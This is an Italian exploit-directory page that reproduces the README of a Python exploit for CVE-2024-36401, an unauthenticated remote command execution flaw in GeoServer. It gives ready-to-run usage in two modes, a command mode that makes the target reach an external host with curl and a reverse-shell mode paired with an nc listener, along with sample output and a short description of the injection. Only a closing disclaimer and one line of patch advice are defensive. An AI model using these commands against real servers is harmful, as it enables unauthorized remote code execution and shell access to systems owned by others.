Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-36401 — Un Exploit Python per "GeoServer" | Kitploit
Strumenti/GitHubGitHub/urjack2025/cve-2024-36401
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHuburjack2025/cve-2024-36401

CVE-2024-36401

Un Exploit Python per "GeoServer"

Vedi Repository
210 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-36401 Strumento di sfruttamento della vulnerabilità GeoServer

Introduzione alla vulnerabilità

CVE-2024-36401 è una vulnerabilità di esecuzione remota di comandi in GeoServer. Un attaccante può eseguire comandi arbitrari senza autorizzazione costruendo specifiche richieste WFS (Web Feature Service).

Requisiti ambientali

  • Python 3.x
  • Installare le dipendenze necessarie: pip install requests

Modalità d'uso

Lo strumento supporta due modalità d'uso: modalità cmd (esecuzione diretta di comandi) e modalità reverse (creazione di una shell inversa).

1. Verificare se il target è in grado di contattare l'esterno

Supponendo che l'indirizzo VPS sia 111.46.112.85, utilizzare la modalità cmd per eseguire un comando curl e verificare se il server di destinazione può accedere alla rete esterna:

root@kitploit:~
python exp.py cmd "8.147.134.121:32831" "curl http://111.46.112.85:8090/hello"

Metodo di verifica: avviare un server HTTP sul VPS per ricevere le richieste

root@kitploit:~
# Eseguire sul VPS
python -m http.server 8090

Se le informazioni di ritorno vengono ricevute con successo, si vedrà un output simile al seguente:

root@kitploit:~
Serving HTTP on 0.0.0.0 port 8090 (http://0.0.0.0:8090/) ...
39.106.20.178 - - [04/Oct/2025 17:22:30] code 404, message File not found
39.106.20.178 - - [04/Oct/2025 17:22:30] "GET /hello HTTP/1.1" 404 -

2. Stabilire una connessione shell inversa

Utilizzare la modalità reverse per stabilire una shell inversa verso un VPS e una porta specifici:

Passo 1: Impostare la porta in ascolto sul VPS

root@kitploit:~
# Eseguire sul VPS
nc -lvp 6666

Passo 2: Eseguire lo strumento di sfruttamento per avviare la connessione inversa

root@kitploit:~
python exp.py reverse "8.147.134.121:32831" 111.46.112.85 6666

Dopo l'esecuzione, lo strumento mostrerà un output simile a:

root@kitploit:~
[+] Response Status: 400
[+] Response Length: 1121
<?xml version="1.0" encoding="UTF-8"?><ows:ExceptionReport xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="2.0.0" xsi:schemaLocation="http://www.opengis.net/ows/1.1 http://8.147.134.121:32831/geoserver/schemas/ows/1.1.0/owsAll.xsd">
<ows:Exception exceptionCode="NoApplicableCode">
<ows:ExceptionText>java.lang.ClassCastException: class java.lang.ProcessImpl cannot be cast to class org.opengis.fea

A questo punto, se lo sfruttamento ha successo, il listener nc sul VPS riceverà una sessione di shell inversa.

Descrizione dei parametri dello strumento

root@kitploit:~
Usage:
  python exp.py cmd <target> <command>
  python exp.py reverse <target> <vps_ip> <vps_port>
  • cmd: modalità di esecuzione di un singolo comando
  • reverse: modalità di shell inversa
  • <target>: indirizzo e porta del server di destinazione, nel formato ip:port
  • <command>: comando da eseguire sul server di destinazione
  • <vps_ip>: indirizzo IP del server VPS
  • <vps_port>: porta in ascolto sul VPS

Principio della vulnerabilità

Questa vulnerabilità sfrutta un difetto di sicurezza nel servizio WFS di GeoServer, iniettando codice Java nel valueReference per eseguire comandi di sistema. Lo strumento costruisce un payload XML contenente codice malevolo e lo invia all'interfaccia WFS di GeoServer, realizzando così l'esecuzione remota di comandi.

Note

  1. Questo strumento è destinato esclusivamente a ricerche sulla sicurezza e verifica di vulnerabilità. Non utilizzarlo per test non autorizzati.
  2. Qualsiasi conseguenza derivante dall'uso di questo strumento è di esclusiva responsabilità dell'utente.
  3. Quando si utilizza la funzione di shell inversa, assicurarsi di avere l'autorizzazione per accedere al sistema di destinazione e di operare entro i limiti delle leggi e normative pertinenti.
  4. Se si tratta di un ambiente di test in un campo di addestramento, gli organizzatori potrebbero aver modificato alcune route predefinite per aumentare la difficoltà, causando il malfunzionamento dell'exploit fornito. In tal caso, potrebbe essere necessario correggere il campo /geoserver/wfs con il contenuto appropriato.

Raccomandazioni per la correzione

Aggiornare tempestivamente GeoServer alla versione di sicurezza rilasciata ufficialmente e configurare il server seguendo le migliori pratiche di sicurezza.

Scarica lo strumento